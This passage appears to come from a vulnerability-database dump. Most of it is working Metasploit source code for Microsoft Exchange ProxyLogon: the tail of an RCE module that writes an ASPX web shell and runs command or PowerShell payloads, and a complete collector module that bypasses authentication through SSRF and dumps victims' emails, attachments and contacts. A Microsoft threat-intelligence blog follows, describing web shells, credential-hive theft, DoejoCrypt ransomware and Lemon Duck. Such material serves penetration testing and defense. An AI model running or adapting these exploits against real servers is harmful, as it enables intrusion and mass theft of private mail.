opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n web_dir = datastore['IISWritePath'].gsub('\\\\', '/')\n else\n web_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n web_dir\n end\n\n def write_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n remote_file = \"#{rand_text_alpha(4..8)}.aspx\"\n if datastore['UseAlternatePath']\n remote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n else\n remote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n remote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\"\n end\n\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n FilePathName: remote_path.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n remote_file\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n exploit_info = run_cve_2021_26855\n\n print_status(message('Attempt to exploit for CVE-2021-27065'))\n shell_info = run_cve_2021_27065(exploit_info)\n\n @random_inputname = shell_info[0]\n @random_filename = shell_info[1]\n\n print_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n if datastore['UseAlternatePath']\n remote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\"\n else\n remote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\"\n end\n register_files_for_cleanup(remote_file)\n\n # trigger powa!\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n response = execute_command(\"cmd /c #{payload.encoded}\")\n\n print_warning('Dumping command output in response')\n output = response.body.split('Name :')[0]\n if output.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(output)\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxylogon_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:39", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...). This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T19:52:01", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/exchange_proxylogon_collector/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By taking advantage of this vulnerability, it is possible to dump all\n mailboxes (emails, attachments, contacts, ...).\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'GreyOrder', # PoC (https://github.com/GreyOrder)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author independent researcher (work at Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/'],\n ['URL', 'https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid'],\n ['URL', 'https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Actions' => [\n [\n 'Dump (Contacts)', {\n 'Description' => 'Dump user contacts from exchange server',\n 'id_attribute' => 'contacts'\n }\n ],\n [\n 'Dump (Emails)', {\n 'Description' => 'Dump user emails from exchange server'\n }\n ]\n ],\n 'DefaultAction' => 'Dump (Emails)',\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptBool.new('ATTACHMENTS', [true, 'Dump documents attached to an email', true]),\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check (only).', 'POST', ['GET', 'POST']]),\n OptString.new('TARGET', [false, 'Force the name of the internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 2147483647])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def dump_contacts(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(action['id_attribute']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{action['id_attribute']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:ContactsFolder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{action['id_attribute']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:ContactsFolder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of contact found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of contact recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n response = send_xml('POST', ssrf, soap_listitems(action['id_attribute'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n data = xml.xpath('//t:Items/t:Contact', XMLNS)\n if data.empty?\n print_status('The user has no contacts')\n else\n write_loot(\"#{datastore['EMAIL']}_#{action['id_attribute']}\", data.to_s)\n end\n end\n end\n\n def dump_emails(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(datastore['FOLDER']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{datastore['FOLDER']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:Folder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{datastore['FOLDER']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of email recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n download_items(total_count, ssrf)\n end\n end\n\n def download_attachments(item_id, ssrf)\n response = send_xml('POST', ssrf, soap_listattachments(item_id))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Message/t:Attachments/t:FileAttachment', XMLNS).each do |item|\n item_id = item.at_xpath('./t:AttachmentId', XMLNS)&.values&.at(0)\n\n response = send_xml('POST', ssrf, soap_downattachment(item_id))\n data = Nokogiri::XML.parse(response.body)\n\n filename = data.at_xpath('//t:FileAttachment/t:Name', XMLNS)&.content\n ctype = data.at_xpath('//t:FileAttachment/t:ContentType', XMLNS)&.content\n content = data.at_xpath('//t:FileAttachment/t:Content', XMLNS)&.content\n\n print_status(\" -> attachment: #{item_id} (#{filename})\")\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(content), filename, ctype)\n end\n end\n\n def download_items(total_count, ssrf)\n response = send_xml('POST', ssrf, soap_listitems(datastore['FOLDER'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Items/t:Message', XMLNS).each do |item|\n item_info = item.at_xpath('./t:ItemId', XMLNS)&.values\n next if item_info.nil?\n\n print_status(\"Download item: #{item_info[1]}\")\n\n response = send_xml('POST', ssrf, soap_downitem(item_info[0], item_info[1]))\n data = Nokogiri::XML.parse(response.body)\n\n email = data.at_xpath('//t:Message/t:MimeContent', XMLNS)&.content\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(email))\n\n attachments = item.at_xpath('./t:HasAttachments', XMLNS)&.content\n if datastore['ATTACHMENTS'] && attachments == 'true'\n download_attachments(item_info[0], ssrf)\n end\n print_status\n end\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_xml('POST', \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", soap_autodiscover)\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.empty?\n\n server = ''\n owa_urls = []\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n\n next unless type == 'WEB'\n\n item.xpath('./xmlns:Internal/xmlns:OWAUrl', xmlns).each do |owa_url|\n owa_urls << owa_url.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n fail_with(Failure::NotFound, 'No \\'OWAUrl\\' was found') if owa_urls.empty?\n\n return([server, legacy_dn, owa_urls])\n end\n\n def send_http(method, ssrf, data: '', ctype: 'application/x-www-form-urlencoded')\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'cookie' => \"X-BEResource=#{ssrf};\",\n 'ctype' => ctype\n }\n request = request.merge({ 'data' => data }) unless data.empty?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_xml(method, ssrf, data, ctype: 'text/xml; charset=utf-8')\n send_http(method, ssrf, data: data, ctype: ctype)\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def soap_countitems(folder_id)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{folder_id}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listattachments(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:AdditionalProperties>\n <t:FieldURI FieldURI=\"item:Attachments\" />\n </t:AdditionalProperties>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{item_id}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listitems(folder_id, max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{folder_id}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downattachment(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetAttachment>\n <m:AttachmentIds>\n <t:AttachmentId Id=\"#{item_id}\" />\n </m:AttachmentIds>\n </m:GetAttachment>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downitem(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(type, data, name = '', ctype = 'text/plain')\n loot_path = store_loot(type, ctype, datastore['RHOSTS'], data, name, '')\n print_good(\"File saved to #{loot_path}\")\n end\n\n def run\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn, owa_urls = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n print_status(\"Internal target(s): #{owa_urls.join(', ')}\")\n\n # selecting target\n print_status(message('Selecting the first internal server to respond'))\n if datastore['TARGET'].nil? || datastore['TARGET'].empty?\n target = ''\n owa_urls.each do |url|\n host = url.split('://')[1].split('.')[0].downcase\n next unless host != server_name.downcase\n\n response = send_http('GET', \"#{host}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\")\n next unless response.code == 200\n\n target = host\n print_good(\"Targeting internal: #{url}\")\n\n break\n end\n fail_with(Failure::NotFound, 'No internal target was found') if target.empty?\n else\n target = datastore['TARGET']\n print_good(\"Targeting internal forced to: #{target}\")\n end\n\n # run action\n case action.name\n when /Dump \\(Contacts\\)/\n print_status(message(\"Attempt to dump contacts for <#{datastore['EMAIL']}>\"))\n dump_contacts(target)\n when /Dump \\(Emails\\)/\n print_status(message(\"Attempt to dump emails for <#{datastore['EMAIL']}>\"))\n dump_emails(target)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/exchange_proxylogon_collector.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-03-26T05:16:59", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dopped the xx.bat file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some 